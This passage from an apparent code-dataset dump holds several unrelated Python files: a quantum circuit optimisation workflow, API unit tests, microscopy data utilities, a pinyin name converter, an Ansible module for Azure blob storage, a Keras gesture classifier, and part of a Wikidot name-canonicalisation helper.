optimizer.minimize(cost_function, initial_parameters, keep_history)\n #save_optimization_results(opt_results, \"qcbm-optimization-results.json\")\n return opt_results\n@qe.workflow(name='top20-{n_layers}-{topology}-{method}-{tag}',\n import_defs=[\n qe.GitImportDefinition.get_current_repo_and_branch(),\n qe.GitImportDefinition(\n repo_url=\"git@github.com:zapatacomputing/z-quantum-core.git\",\n branch_name=\"master\",\n ),\n qe.GitImportDefinition(\n repo_url=\"git@github.com:zapatacomputing/z-quantum-optimizers.git\",\n branch_name=\"gd_opt\",\n ),\n qe.GitImportDefinition(\n repo_url=\"git@github.com:zapatacomputing/z-quantum-qcbm.git\",\n branch_name=\"master\",\n ),\n qe.GitImportDefinition(\n repo_url=\"git@github.com:zapatacomputing/qe-qulacs.git\",\n branch_name=\"master\",\n )\n\n ])\ndef workflow(n_layers: int, n_qubits: int, topology: str, method: str,options: dict, keep_history: bool = True, tag: int = None):\n target_distribution=get_distribution(n_qubits)\n ansatz=get_ansatz(n_qubits,n_layers,topology)\n initial_parameters=generate_random_ansatz_params(ansatz)\n optimizer_specs=get_specs(method,options)\n output = optimize_variational_qcbm_circuit(ansatz,optimizer_specs,\n initial_parameters,target_distribution,\n keep_history)\n return output\n\nif __name__ == \"__main__\":\n n_layers=3\n n_qubits=12\n topology='all'\n filename=\"top20_ids.csv\"\n\n method,options ='rmsprop',{'lr':0.01,'maxiter':30}\n #method,options ='l-bfgs-b', {'ftol':1e-12,'gtol':1e-12,'maxiter':3500,'maxfun':int(1e9),}\n #method,options ='basin-l-bfgs-b', {'niter':50,'minimizer_kwargs':{'method':'l-bfgs-b','maxiter':500}}\n\n with open(filename, 'a+') as file:\n fieldnames = ['n_layers', 'topology', 'method', 'id']\n w = csv.DictWriter(file, fieldnames=fieldnames)\n if file.tell() == 0:\n w.writeheader()\n for tag in range(0,2):\n qe.step.unique_names = []\n wf = workflow(n_layers,n_qubits,topology,method,options,tag=tag)\n out = wf.submit()\n id = out.workflow_id\n writeout={'topology':topology,'n_layers':n_layers,'method':method,'id':id}\n print(id)\n #w.writerow(writeout)\n\n","repo_name":"salperinlea/bars-and-stripes","sub_path":"workflow.py","file_name":"workflow.py","file_ext":"py","file_size_in_byte":7558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"26895964183","text":"'''\n@Descripttion: getLanguage接口APItest脚本\n@Author: Tommy\n@Date: 2020-06-02 16:01:55\nLastEditors: Tommy\nLastEditTime: 2020-08-13 11:01:05\n'''\nimport unittest\nimport requests\nimport time\nimport json\n# from tool import Tool\n\n\nclass GetLanguage(unittest.TestCase):\n \"\"\"Language API测试\"\"\"\n @classmethod\n def setUpClass(cls):\n with open(\"config.json\", 'r') as f:\n cls.value_dict = json.load(f)\n\n def setUp(self):\n self.game_date = time.strftime(\"%Y%m%d\", time.localtime())\n self.url = ''.join([self.__class__.value_dict['url'], 'getLanguage_v1'])\n # self.url = 'https://tapcolor-lite.weplayer.cc/getLanguage?'\n self.params = {\n \"game_ver\": self.__class__.value_dict['game_ver'],\n \"os_type\": self.__class__.value_dict['os_type'],\n \"register_date\": self.__class__.value_dict['register_date'],\n \"game_date\": self.game_date,\n \"game_actDay\": self.__class__.value_dict['game_actDay'],\n \"language_key\": \"ChineseSimplified\",\n \"language_version\": \"-1\",\n \"forece_get\": \"1\"\n }\n\n # def test_getLanguage_content(self):\n # '''测试新老接口返回数值是否相同'''\n # r1 = requests.get(self.url, params=self.params)\n # result1 = r1.json()\n # self.url = 
''.join(\n # [self.__class__.value_dict['url_new'], 'getLanguage_v1'])\n # r2 = requests.get(self.url, params=self.params)\n # result2 = r2.json()\n # Tool.cmp(result2, result1, \"language\")\n\n def test_getLanguage_success(self):\n '''测试Language成功'''\n r = requests.get(self.url, params=self.params)\n result = r.json()\n # 断言\n self.assertEqual(result['errorCode'], -1)\n self.assertNotEqual(len(result['data']['language']), 0, msg=\"language数据为空\")\n\n def test_getLanguage_ios_success(self):\n '''测试IOS Language成功'''\n self.params['os_type'] = \"Ios\"\n r = requests.get(self.url, params=self.params)\n result = r.json()\n # 断言\n self.assertEqual(result['errorCode'], -1)\n self.assertNotEqual(len(result['data']['language']), 0, msg=\"language数据为空\")\n\n def test_getLanguage_languageNone(self):\n '''测试参数缺失'''\n self.params['language_key'] = \"\"\n r = requests.get(self.url, params=self.params)\n result = r.json()\n # 断言\n self.assertEqual(result['error_code'], 666)\n self.assertEqual(\n result['error_msg'],\n \"path: language_key, error: language_key is required.\")\n\n def test_getLanguage_ios_languageNone(self):\n '''测试IOS 参数缺失'''\n self.params['language_key'] = \"\"\n self.params['os_type'] = \"Ios\"\n r = requests.get(self.url, params=self.params)\n result = r.json()\n # 断言\n self.assertEqual(result['error_code'], 666)\n self.assertEqual(\n result['error_msg'],\n \"path: language_key, error: language_key is required.\")\n\n def test_getLanguage_dateError(self):\n '''测试日期格式错误'''\n self.params['game_date'] = \"2020-05-29\"\n r = requests.get(self.url, params=self.params)\n result = r.json()\n # 断言\n self.assertEqual(result['error_code'], 666)\n self.assertEqual(\n result['error_msg'],\n \"path: game_date, error: game_date must have a length between 8 and 8.\"\n )\n\n def test_getLanguage_ios_dateError(self):\n '''测试IOS 日期格式错误'''\n self.params['game_date'] = \"2020-05-29\"\n self.params['os_type'] = \"Ios\"\n r = requests.get(self.url, params=self.params)\n result = r.json()\n # 断言\n self.assertEqual(result['error_code'], 666)\n self.assertEqual(\n result['error_msg'],\n \"path: game_date, error: game_date must have a length between 8 and 8.\"\n )\n\n def test_getLanguage_requestsError(self):\n '''测试requests错误'''\n del self.params['game_ver']\n r = requests.get(self.url, params=self.params)\n result = r.json()\n # 断言\n self.assertEqual(result['error_code'], 666)\n self.assertEqual(result['error_msg'],\n \"path: game_ver, error: game_ver is required.\")\n\n def test_getLanguage_ios_requestsError(self):\n '''测试IOS requests错误'''\n del self.params['game_ver']\n self.params['os_type'] = \"Ios\"\n r = requests.get(self.url, params=self.params)\n result = r.json()\n # 断言\n self.assertEqual(result['error_code'], 666)\n self.assertEqual(result['error_msg'],\n \"path: game_ver, error: game_ver is required.\")\n\n def test_getLanguage_type(self):\n '''验证返回值是否正确'''\n r = requests.get(self.url, params=self.params)\n result = r.json()\n # 断言\n self.assertEqual(result['errorCode'], -1)\n self.assertNotEqual(len(result['data']['language']), 0, msg=\"language数据为空\")\n self.assertIsInstance(result['data']['language'], dict)\n\n def test_getLanguage_ios_type(self):\n '''验证IOS 返回值是否正确'''\n self.params['os_type'] = \"Ios\"\n r = requests.get(self.url, params=self.params)\n result = r.json()\n # 断言\n self.assertEqual(result['errorCode'], -1)\n self.assertNotEqual(len(result['data']['language']), 0, msg=\"language数据为空\")\n self.assertIsInstance(result['data']['language'], dict)\n\n\nif __name__ == '__main__':\n 
unittest.main()\n","repo_name":"Tbacode/ToolSuit","sub_path":"工具包/color_InterfaceTest/API_test/test_case/tapcolor_api_getLanguage.py","file_name":"tapcolor_api_getLanguage.py","file_ext":"py","file_size_in_byte":5671,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"19250050820","text":"import os\nimport sys\nimport socket\nfrom sys import platform as _platform\nimport numpy as np\n\n\ndef find_hostname_and_ip():\n \"\"\"Finds the hostname and IP address to go in the log file.\n\n Args:\n No arguments\n\n Returns:\n host (str): Name of the host machine executing the script.\n ip_address (str): IP adress of the machine that runs the script.\n operating_system (str): Operating system of the machine that runs the script.\n\n \"\"\"\n host = 'undetermined'\n ip_address = 'undetermined'\n operating_system = 'undetermined'\n\n try:\n host = socket.gethostbyaddr(socket.gethostname())[0]\n except socket.herror:\n host = \"undetermined\"\n\n my_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\n try:\n # doesn't even have to be reachable\n my_socket.connect(('10.255.255.255', 1))\n ip_address = my_socket.getsockname()[0]\n except socket.error:\n ip_address = '127.0.0.1'\n finally:\n my_socket.close()\n\n if _platform in (\"linux\", \"linux2\"):\n # linux\n operating_system = 'Linux'\n elif _platform == \"darwin\":\n # MAC OS X\n operating_system = 'Mac OSX'\n elif _platform == \"win32\":\n # Windows\n operating_system = 'Windows'\n elif _platform == \"win64\":\n # Windows 64-bit\n operating_system = 'Windows'\n\n return host, ip_address, operating_system\n\n\ndef find_exponent(number_string):\n '''Returns the number of significant digits in a number. This takes into account\n strings formatted in 1.23e+3 format and even strings such as 123.450'''\n # change all the 'E' to 'e'\n number_string = number_string.lower()\n if 'e' in number_string:\n # return the length of the numbers before the 'e'\n exponent_string = number_string.split('e', 1)[1]\n return exponent_string # to compenstate for the decimal point\n else:\n # put it in e format and return the result of that\n ### NOTE: the 8 below is picked as on my system floats convert to the\n ### mantissa and exponent format when the exponent reaches 5 and the\n ### 8 allows some change for different systems\n number = ('%.*e' %(8, float(number_string))).split('e')\n #pass it back to the beginning to be parsed\n return find_exponent('e'.join(number))\n #return \"error, number not recognised as a float\"\n\n\ndef plus_and_minus(value, uncertainty):\n ''' Takes a value and its uncertainty and provides string values for each\n which can be used in the format 'value +/- uncertainty'\n\n Args:\n value: A float the value that has an error value.\n uncertainty: A float the uncetainty of the value which is generally\n smaller than the value.\n Returns:\n value_str: A string with the value given to the number of relevant places\n as determined by the uncertainty.\n uncertainty_str: A string with the uncertainty given to 2 decimal places.\n '''\n\n\n uncertainty_str = \"%.2g\" % (uncertainty)\n uncertainty_expo = int(find_exponent(uncertainty_str))\n value_str = \"%.2g\" % (value)\n value_expo = int(find_exponent(value_str))\n if value_expo >= uncertainty_expo:\n whole_number = 1\n fraction = 1\n if uncertainty_expo > 0:\n whole_number = uncertainty_expo\n if uncertainty_expo < 0:\n fraction = abs(uncertainty_expo)+1\n\n uncertainty_str = \"%.2f\" % (uncertainty)\n value_str = 
'{0:{1}.{2}f}'.format(value, whole_number, fraction)\n\n uncertainty_str = '{0:.2f}'.format(uncertainty)\n if value_expo < uncertainty_expo:\n whole_number = 1\n fraction = 1\n if value_expo > 0:\n whole_number = value_expo\n if value_expo < 0:\n fraction = abs(value_expo)+1\n\n value_str = \"%.2f\" % (value)\n uncertainty_str = '{0:{1}.{2}f}'.format(uncertainty, whole_number, fraction)\n\n return value_str, uncertainty_str\n\n\n\ndef primary_filename_and_path_setup(info):\n ''' Takes information from the python dictionary, info, on the location of the\n input data file to create the data strings nescessary to create the output\n path and file names for images of plots, the html report and output data\n files. The filename and path is different for relative_positions.py as it\n reads experimental data as a primary source to models which read the output\n of relative_positions.py. This function is for relative_positions.py.\n\n Args:\n info (dict):\n A python dictionary containing a collection of useful\n parameters such as the filenames and paths. New values written\n to the dictionary do not need to be explicitly returned by\n the function as they can be seen in info in other functions.\n '''\n\n path, in_file_no_path = os.path.split(info['in_file_and_path'])\n\n index_of_dot = in_file_no_path.index(\".\")\n filename_without_extension = in_file_no_path[:index_of_dot]\n\n # Put parameters in directory name\n parameter_str = \"filter_\"+str(info['filter_dist'])+\"_\"+str(info['dims'])+\"D_\"\n\n results_dir = (path+r\"/PERPL_\"+info['prog']+r\"/\"+filename_without_extension\n +r\"/\"+parameter_str)\n\n # Include colour channel information, if used\n if info['colours_analysed'] == 1:\n results_dir = results_dir + 'col' +repr(info['start_channel'])+ '_'\n if info['colours_analysed'] == 2:\n results_dir = (results_dir\n + 'cols' +repr(info['start_channel'])+ 'to' +repr(info['end_channel'])+ '_'\n )\n\n # Include histogram bin-size\n results_dir = results_dir + 'bin' +repr(info['bin_size'])+ '_'\n\n # Include start time\n results_dir = results_dir + info['start']\n\n # Set up short directory name to save space\n short_filename_without_extension = \\\n filename_without_extension[:5]+r\"-s-\"+filename_without_extension[-5:]\n\n # Include some parameters\n short_parameter_str = \"f_\"+str(info['filter_dist'])+\"_\"+str(info['dims'])+\"D_\"\n\n short_results_dir = (\n path+r\"/PERPL_\"\n +info['prog_short_name']\n +r\"/\"+short_filename_without_extension\n +r\"/\"+short_parameter_str\n )\n if info['colours_analysed'] == 1:\n short_results_dir = short_results_dir + 'c' +repr(info['start_channel'])+ '_'\n if info['colours_analysed'] == 2:\n short_results_dir = (short_results_dir\n + 'c' +repr(info['start_channel'])+ '-' +repr(info['end_channel'])\n + '_'\n )\n short_results_dir = short_results_dir + 'b' + repr(info['bin_size'])+ '_'\n short_results_dir = short_results_dir + info['start']\n\n info['results_dir'] = results_dir\n info['in_file_no_extension'] = filename_without_extension\n info['in_file_no_path'] = in_file_no_path\n info['short_results_dir'] = short_results_dir\n info['short_filename_without_extension'] = short_filename_without_extension\n\n\ndef secondary_filename_and_path_setup(info):\n ''' Takes information from the python dictionary, info, on the location of the\n input data file to create the data strings nescessary to create the output\n path and file names for images of plots, the html report and output data\n files. 
The filename and path is different for relative_positions.py as it\n reads experimental data as a primary source to models which read the output\n of relative_positions.py. This function is for model scripts.\n\n Args:\n info (dict):\n A python dictionary containing a collection of useful\n parameters such as the filenames and paths. New values written\n to the dictionary do not need to be explicitly returned by\n the function as they can be seen in info in other functions.\n '''\n\n path, in_file_no_path = os.path.split(info['in_file_and_path'])\n\n index_of_dot = in_file_no_path.index(\".\")\n filename_without_extension = in_file_no_path[:index_of_dot]\n\n parameter_str = \"filter_\"+str(info['filter_dist'])+\"_\"\n\n\n results_dir = (path+r\"/\"+info['prog']+r\"/\"+r\"/\"+parameter_str+info['start'])\n\n\n short_filename_without_extension = \\\n filename_without_extension[:5]+r\"-s-\"+filename_without_extension[-5:]\n short_parameter_str = \"f_\"+str(info['filter_dist'])+\"_\"\n\n short_results_dir = (path+r\"/\"+info['prog_short_name']+r\"/\"+short_filename_without_extension\n +r\"/\"+short_parameter_str+info['start'])\n\n info['results_dir'] = results_dir\n info['in_file_no_extension'] = filename_without_extension\n info['in_file_no_path'] = in_file_no_path\n info['short_results_dir'] = short_results_dir\n info['short_filename_without_extension'] = short_filename_without_extension\n\n\ndef secondary_read_data_in(info):\n \"\"\"Reads data from the input file thats filename is provided as an argument\n to this program or from the command line while this program executes.\n This reader is for a model and so only reads data that is ouput from\n relative_positions.py.\n Also extracts unful substrings from the input filename that will be used\n to outpur results files and puts them in the\n info dictionary. These are:\n results_dir (str): All output files are saved in a directory at the same\n level in the directory structure as the input data and with the\n name that consists of the input file and a date stamp.\n in_file_no_path (str): The input file name with no path.\n filename_without_extension (str): Input file name wihtout the path and\n file extension. It is used to create a unique name of the output\n data file and directory.\n\n Args:\n info (dict): A python dictionary containing a collection of useful parameters\n such as the filenames and paths.\n Returns:\n xyz_values (numpy array): A numpy array of the x, y (and z) localisations.\n \"\"\"\n\n in_file = info['in_file_and_path']\n\n if not os.path.exists(in_file):\n sys.exit(\"ERROR; The input file does not exist.\")\n\n if in_file[-4:] == '.csv':\n try:\n line = open(in_file).readline()\n except (EOFError, IOError, OSError) as exception:\n print(\"\\n\\nCould not open file: \", in_file)\n print(\"\\n\\n\", type(exception))\n sys.exit(\"Could not open the input file \"+in_file+\".\\n\")\n if (line.__contains__(\"xx_separation,yy_separation, ,xy_separation\") or\n line.__contains__(\"xx_separation,yy_separation,zz_separation,\"\n \"xy_separation,xz_separation,yz_separation,\"\n \"xyz_separation\")):\n skip = 1\n try:\n xyz_values = np.loadtxt(in_file, delimiter=',', skiprows=skip)\n except (EOFError, IOError, OSError) as exception:\n print(\"\\n\\nCould not read file: \", in_file)\n print(\"\\n\\n\", type(exception))\n sys.exit(\"Could not read the input file \"+in_file+\".\\n\")\n else:\n xyz_values = 'Ouch'\n print('Sorry, wrong format! 
This program needs a file output from '\n 'relative_positions.py\\n')\n sys.exit(\"The input file \"+in_file+\" has the wrong format. It needs \"\n \"a file output form relative_positions\\n\")\n else:\n xyz_values = 'Ouch'\n print('Sorry, wrong format! This program needs a file output from '\n 'relative_positions.py\\n')\n sys.exit(\"The input file \"+in_file+\" has the wrong format. It needs \"\n \"a file output form relative_positions\\n\")\n\n\n info['values'] = xyz_values.shape[0]\n info['columns'] = xyz_values.shape[1]\n info['total_values'] = xyz_values.shape[0]\n info['total_columns'] = xyz_values.shape[1]\n\n\n return xyz_values\n","repo_name":"AlistairCurd/PERPL-Python3","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":11970,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"3016721354","text":"# -*- coding:utf-8 -*-\n# @Time : 2022/3/20 14:01\n# @Author : Yinkai Yang\n# @FileName: extraction_utils.py\n# @Software: PyCharm\n# @Description: this is a program related to\nimport pandas as pd\nfrom pypinyin import lazy_pinyin\n\n\ndef write_file(teachers):\n \"\"\"写文件,向teacher.txt文件中写入老师的英文名字\n\n :param teachers: 老师的英文名字列表list\n :return: 无\n \"\"\"\n count = 0\n with open(\"teacher.txt\", \"w+\") as f:\n for i in teachers:\n f.write(i)\n count = count + 1\n if count != len(teachers):\n f.write('\\n')\n f.close()\n return\n\n\ndef util_function():\n \"\"\"从teaches_name.xlsx文件中读取老师的中文名字,转换成英文。\n 这边功能有点杂糅,可以把将数据处理定义为一个函数(略过此操作)\n\n :return: 无\n \"\"\"\n teachers_list = []\n ex = pd.read_excel(\"teachers_name.xlsx\")\n for i in ex['姓名']:\n name_list = lazy_pinyin(i)\n\n first_name = name_list[0]\n last_name_list = name_list[1:]\n last_name = \"\"\n for character in last_name_list:\n last_name = last_name + character\n\n en_name = last_name.capitalize() + \"_\" + first_name.capitalize()\n teachers_list.append(en_name)\n write_file(teachers_list)\n return\n\n","repo_name":"Yykai1/detail_information","sub_path":"extraction_utils.py","file_name":"extraction_utils.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"7660231479","text":"#!/usr/bin/python\n\n# (c) Robert Forsström, robert@middleware.se\n\n#TODO: Both present with a src_blob_name and same_as builds the\n# BlobObject this should be put in to an function. 
Also add a posibillity to just define the container as src.\n\n\n\n#---- From Library File: AzureStorage.py ----\n\n\n\nimport json\n\n\nclass AzureStorage(object):\n def __init__(self, resource_group, name):\n self.resourceGroup = resource_group\n self.storageAccountName = name\n self.connectionString = False\n\n def getConnectionString(self):\n if self.connectionString==False:\n azcs = AzureClient.run([\"azure\", \"storage\", \"account\", \"connectionstring\", \"show\", \"--json\", \"--resource-group\", self.resourceGroup, self.storageAccountName])\n if azcs[\"rc\"] != 0:\n raise AzureProvisionException(azcs[\"err\"])\n cs = json.loads (azcs[\"out\"])\n self.connectionString = cs[\"string\"]\n\n return self.connectionString\n\n\n#---- EOF: AzureStorage.py ---\n\n\n\n#---- From Library File: AzureBlob.py ----\n\n\nimport os\nimport hashlib\nimport base64\n\nclass AzureBlob(AzureStorage):\n def __init__(self, resource_group, account, container, name):\n super(self.__class__, self).__init__(resource_group, account)\n self.container = container\n self.name = name\n\nclass AzureBlobOps():\n\n @staticmethod\n def upload(localPath, blob , type):\n if not os.path.isfile(localPath):\n raise AzureNotFound(\"Local file not found: \"+ localPath)\n azcs = AzureClient.run([\"azure\", \"storage\", \"blob\", \"upload\", \"--connection-string\", blob.getConnectionString(), \"--container\", blob.container, \"--blob\", blob.name,\"--blobtype\", type, \"--json\", \"--quiet\", \"--file\", localPath])\n if azcs[\"rc\"] != 0:\n raise AzureNotFound(\"Upload failed: \"+ azcs[\"err\"])\n\n @staticmethod\n def exists(blob):\n azcs = AzureClient.run([\"azure\", \"storage\", \"blob\", \"show\", \"--connection-string\", blob.getConnectionString(), \"--container\", blob.container, \"--blob\", blob.name, \"--json\"])\n if azcs[\"rc\"] != 0:\n return False\n return True\n\n @staticmethod\n def copy(blob, dest):\n azcs = AzureClient.run([\"azure\", \"storage\", \"blob\", \"copy\", \"start\", \"--connection-string\", blob.getConnectionString(), \"--source-container\", blob.container, \"--source-blob\", blob.name,\"--dest-connection-string\", dest.getConnectionString(), \"--dest-container\", dest.container, \"--dest-blob\", dest.name, \"--quiet\", \"--json\"])\n ## TODO: Wait until filecopy has succeeded.\n\n if azcs[\"rc\"] != 0:\n raise AzureNotFound(\"Copy failed\"+ azcs[\"err\"])\n\n @staticmethod\n def blobIsSameAs(blob1, blob2):\n azcs1 = AzureClient.run([\"azure\", \"storage\", \"blob\", \"show\", \"--connection-string\", blob1.getConnectionString(), \"--container\", blob1.container, \"--blob\", blob1.name, \"--json\"])\n azcs2 = AzureClient.run([\"azure\", \"storage\", \"blob\", \"show\", \"--connection-string\", blob2.getConnectionString(), \"--container\", blob2.container, \"--blob\", blob2.name, \"--json\"])\n\n if azcs1[\"rc\"] != 0 or azcs2[\"rc\"] != 0 :\n raise AzureNotFound(\"Comparison failed \"+ azcs1[\"err\"] + azcs2[\"err\"])\n b1res = json.loads (azcs1[\"out\"])\n b2res = json.loads (azcs2[\"out\"])\n\n if b1res[\"contentMD5\"] == b2res[\"contentMD5\"]:\n return True\n return False\n\n @staticmethod\n def localFileIsSameAs(localPath, blob):\n\n if not os.path.isfile(localPath):\n raise AzureNotFound(\"Local file not found: \"+ localPath)\n\n azcs1 = AzureClient.run([\"azure\", \"storage\", \"blob\", \"show\", \"--connection-string\", blob.getConnectionString(), \"--container\", blob.container, \"--blob\", blob.name, \"--json\"])\n if azcs1[\"rc\"] != 0:\n raise AzureNotFound(\"Comparison failed \"+ 
azcs1[\"err\"])\n\n b1res = json.loads (azcs1[\"out\"])\n\n fileMD5 = AzureBlobOps._md5(localPath)\n\n if b1res[\"contentMD5\"] == base64.b64encode(fileMD5):\n return True\n return False\n\n\n @staticmethod\n def _md5(fname):\n hash = hashlib.md5()\n with open(fname, \"rb\") as f:\n for chunk in iter(lambda: f.read(4096), b\"\"):\n hash.update(chunk)\n return hash.digest()\n\n @staticmethod\n def delete(blob):\n pass\n\n\n#---- EOF: AzureBlob.py ---\n\n\n\n#---- From Library File: AzureClient.py ----\n\n\n\nfrom subprocess import CalledProcessError, check_output, Popen, PIPE\n\nclass AzureClient ():\n @staticmethod\n def run (args):\n azp = Popen (args, stdout=PIPE, stderr=PIPE)\n output = azp.communicate();\n stdout = output[0]\n stderr = output[1]\n return dict (out=stdout, err=stderr, rc=azp.returncode)\n\n\n#---- EOF: AzureClient.py ---\n\n\n\n#---- From Library File: AzureExceptions.py ----\n\n\nclass AzureNotModifiable (Exception):\n def __init__(self, msg):\n self.msg=msg\n\nclass AzureClientException (Exception):\n def __init__(self, msg):\n self.msg=msg\n\nclass AzureProvisionException(Exception):\n def __init__(self, msg):\n self.msg=msg\n\nclass AzureParamentersNotValid(Exception):\n def __init__(self, msg):\n self.msg=msg\n\nclass AzureNotFound(Exception):\n def __init__(self, msg):\n self.msg=msg\n\n\n#---- EOF: AzureExceptions.py ---\n\n\n\ndef main():\n\n module = AnsibleModule(\n argument_spec = dict(\n state = dict(default='present', choices=['present', 'absent', 'same_as']),\n name = dict(required=True),\n container = dict(required=True),\n resource_group = dict(required=True),\n storage_account = dict(required=True),\n upload_blob_type = dict(default='block', choices=['block', 'page', 'append']),\n src_blob_name = dict(required=False),\n src_storage_account = dict(required=False),\n src_container = dict(required=False),\n src_local_path = dict(required=False),\n overwrite = dict(default=False, choices=BOOLEANS),\n username = dict(required=False),\n password = dict(required=False)\n )\n )\n\n try:\n azb = AzureBlob(module.params[\"resource_group\"], module.params[\"storage_account\"], module.params[\"container\"], module.params[\"name\"])\n azb_src = None\n\n blobExist= AzureBlobOps.exists(azb)\n\n if module.params[\"state\"] == \"present\":\n\n if blobExist:\n module.exit_json(changed=False)\n\n if not blobExist and module.params[\"src_blob_name\"] is not None:\n src_storage_account = module.params[\"storage_account\"] if module.params[\"src_storage_account\"] is None else module.params[\"src_storage_account\"]\n src_container = module.params[\"container\"] if module.params[\"src_container\"] is None else module.params[\"src_container\"]\n\n azb_src = AzureBlob(module.params[\"resource_group\"],src_storage_account, src_container, module.params[\"src_blob_name\"])\n\n if AzureBlobOps.exists(azb_src):\n AzureBlobOps.copy (azb_src, azb)\n module.exit_json(changed=True)\n else:\n module.fail_json(msg=\"Can not find source blob: \"+module.params[\"src_blob_name\"]+ \" in container \"+src_container + \" on account \" +src_storage_account)\n\n if not blobExist and module.params[\"src_local_path\"] is not None:\n AzureBlobOps.upload(module.params[\"src_local_path\"], azb, module.params[\"upload_blob_type\"] )\n module.exit_json(changed=True)\n\n module.fail_json(msg=\"Blob does not exist.\")\n\n\n\n if module.params[\"state\"] == \"absent\":\n if blobExist:\n AzureBlobOps.delete(azb);\n module.exit_json(changed=True)\n\n module.exit_json(changed=False)\n\n if 
module.params[\"state\"] == \"same_as\":\n if module.params[\"src_blob_name\"] is not None:\n src_storage_account = module.params[\"storage_account\"] if module.params[\"src_storage_account\"] is None else module.params[\"src_storage_account\"]\n src_container = module.params[\"container\"] if module.params[\"src_container\"] is None else module.params[\"src_container\"]\n azb_src = AzureBlob(module.params[\"resource_group\"],src_storage_account, src_container, module.params[\"src_blob_name\"])\n\n if AzureBlobOps.exists(azb_src):\n if AzureBlobOps.blobIsSameAs (azb_src, azb):\n module.exit_json(changed=False)\n else:\n if module.boolean(module.params[\"overwrite\"]):\n AzureBlobOps.copy(azb_src, azb)\n module.exit_json(changed=True)\n else:\n module.fail_json(msg=\"The two blobs are not the same: \"+azb.name +\" != \"+azb_src.name)\n else:\n module.fail_json(msg=\"Can not find source blob: \"+module.params[\"src_blob_name\"]+ \" in container \"+src_container + \" on account \" +src_storage_account)\n\n if module.params[\"src_local_path\"] is not None:\n if AzureBlobOps.localFileIsSameAs (module.params[\"src_local_path\"], azb):\n module.exit_json(changed=False)\n else:\n if module.boolean(module.params[\"overwrite\"]):\n AzureBlobOps.upload(module.params[\"src_local_path\"], azb, module.params[\"upload_blob_type\"])\n module.exit_json(changed=True)\n else:\n module.fail_json(msg=\"The blob and file are not the same: \"+azb.name +\" != \"+module.params[\"src_local_path\"])\n\n except AzureClientException as e:\n module.fail_json(msg=e.msg)\n\n except AzureProvisionException as e:\n module.fail_json(msg=e.msg)\n\n except AzureNotFound as e:\n module.fail_json(msg=e.msg)\n\nfrom ansible.module_utils.basic import *\nif __name__ == '__main__':\n main()\n","repo_name":"mtekkie/ansible-azure","sub_path":"az_blob.py","file_name":"az_blob.py","file_ext":"py","file_size_in_byte":10160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"3226417613","text":"from keras.models import model_from_json\nimport cv2\nimport numpy as np\n\n\ndef preprocess(img):\n img = cv2.resize(img, (64, 64), interpolation=cv2.INTER_NEAREST).astype(np.float32)\n # print(img.shape)\n return img\n\nclass GestureClassifier:\n def __init__(self):\n self.model = None\n\n def load_model(self):\n json_file = open('training/model.json', 'r')\n loaded_model = json_file.read()\n json_file.close()\n self.model = model_from_json(loaded_model)\n self.model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\n self.model.load_weights('training/hand_detection_weights.h5')\n print(\"completed loading model\")\n\n def predict(self, img):\n # print(img.shape)\n img1 = img.copy()\n img1 = preprocess(img1)\n k = self.model.predict(np.array([img1]))\n score = max(k[0])\n res = list(k[0]).index(score)\n\n return chr(65 + res), score\n","repo_name":"apuayush/hand_gest","sub_path":"predict_gesture.py","file_name":"predict_gesture.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"35166396232","text":"# A package to support API access to Wikidot\n\n# *****************************************************************\n# Return a Wikidot cannonicized version of a name\n# The cannonicized name turns all spans of non-alphanumeric characters into a single hyphen, drops all leading and trailing hyphens\n# and turns all alphabetic characters to lower case\n# A Raw 
name is a single string possibly including a category: prefix\ncannonicalToReal = {} # A dictionary which lets us go from cannonical names back to real names\n\n\n# We need to convert a string to Wikidot's cannonical form: All lower case; All spans of special characters reduced to a hyphen; No leading or trailing hyphens.\n# The strategy is to iterate through the name, copying characters to a list of characters which is later merged into the return string. (Appending to a string is too expensive.)\ndef CannonicizeString(name):\n out = []\n inAlpha = False\n inJunk = False\n for c in name:\n if c.isalnum() or c == ':': # \":\", the category separator, is an honorary alphanumeric\n if inJunk:\n out.append(\"-\")\n out.append(c)\n inJunk = False\n inAlpha = True\n else:\n inJunk = True\n inAlpha = False\n # Remove any leading or trailing \"-\"\n canname=''.join(out)\n if canname[0] == \"-\":\n canname=canname[1:]\n if canname[-1] == \"-\":\n canname=canname[:-1]\n return canname\n\n# Take a raw name (mixed case, special characters, a potential category, etc.) and turn it into a properly formatted cannonicized name:\n# Either \"<category>:<name>\" or, when there is no category, just \"<name>\"\n# In both cases, the <name> text is cannonicized\ndef Cannonicize(pageNameZip):\n if pageNameZip == None:\n return None\n pageName = pageNameZip.lower()\n\n # Split out the category, if any.\n splitName=pageName.split(\":\")\n if len(splitName) > 2:\n splitName=[splitName[0], \" \".join(splitName[1:])] # Assume first colon is the category divider. The rest will eventually be ignored\n\n # Handle the case of no category\n if len(splitName) == 1:\n canName=CannonicizeString(splitName[0])\n name=splitName[0]\n else:\n canName=CannonicizeString(splitName[0])+\":\"+CannonicizeString(splitName[1])\n name=splitName[0]+\":\"+splitName[1]\n\n # And save the cannonicized and raw versions of the name in a reverse-lookup dictionary\n if cannonicalToReal.get(canName) == None:\n cannonicalToReal[canName]=name # Add this cannonical-to-real conversion to the dictionary\n return canName\n\n\n# *****************************************************************\n# Potentially add this entry to the list of uncannonicized page names\ndef AddUncannonicalName(uncanName, canName):\n if cannonicalToReal.get(canName) == None:\n cannonicalToReal[canName]=uncanName\n else:\n if ([x.isupper() for x in uncanName].count(True) > [x.isupper() for x in cannonicalToReal[canName]].count(True)):\n cannonicalToReal[canName]=uncanName\n\n\n# *****************************************************************\ndef Uncannonicize(name):\n n=cannonicalToReal.get(name)\n if n != None:\n return n\n\n # OK, this is most likely the name of a redirect page. The best we can do is to remove internal 